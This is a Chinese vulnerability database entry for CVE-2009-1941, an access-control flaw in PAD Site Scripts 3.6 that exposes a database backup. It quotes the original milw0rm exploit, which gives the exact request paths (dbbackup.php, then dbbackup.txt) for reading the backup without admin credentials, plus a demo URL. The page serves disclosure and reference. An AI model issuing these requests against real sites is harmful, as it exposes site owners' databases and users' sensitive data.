Phpeasycode PAD Site Scripts 'dbbackup.txt'权限许可和访问控制漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1117871 漏洞类型 权限许可和访问控制
发布时间 2009-06-01 更新时间 2009-06-05
CVE编号 CVE-2009-1941 CNNVD-ID CNNVD-200906-080
漏洞平台 PHP CVSS评分 5.0
|漏洞来源
https://www.exploit-db.com/exploits/8850
https://www.securityfocus.com/bid/79466
https://cxsecurity.com/issue/WLB-2009060020
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200906-080
|漏洞详情
PADSiteScripts3.6版本中储存敏感信息,但没有赋予足够的访问控制,远程攻击者可以借助对dbbackup.txt的一个直接请求,下载数据库和获得敏感信息。
|漏洞EXP
---------------------------------------------------------------
---------------------------------------------------------------
PAD Site Scripts v3.6 Bypass DB Backup Vulnerability
---------------------------------------------------------------
Founder : TiGeR-Dz
Home:http://www.pad-site-scripts.com
Script:PAD Site Scripts v3.6
Download:http://www.pad-site-scripts.com/demo.php
Thank you my best Friends The g0bL!N and Hisok4
---------------------------------------------------------------
Exploit
-------
www.site.com/[path]/dbbackup.php
Note: We can not download Backup Because This site is required name admin and password for download Backup
and We will read Backup Without Download
Go to www.site.com/dbbackup.txt

And booooooooooom The backup is reading :)
----------------------------------------------------------------
Dem0
----
http://demo.pad-site-scripts.com/sysop/dbbackup.php
Go to
http://demo.pad-site-scripts.com/dbbackup.txt

And booooooooooom The backup is reading :)
--------------------------------------
Greeting To ALL My Friends (Dz)
----------------------------------------------------------------

# milw0rm.com [2009-06-01]
|受影响的产品
Phpeasycode Pad Site Scripts 3.6
|参考资料

来源:XF
名称:pss-dbbackup-info-disclosure(50911)
链接:http://xforce.iss.net/xforce/xfdb/50911
来源:MILW0RM
名称:8850
链接:http://www.milw0rm.com/exploits/8850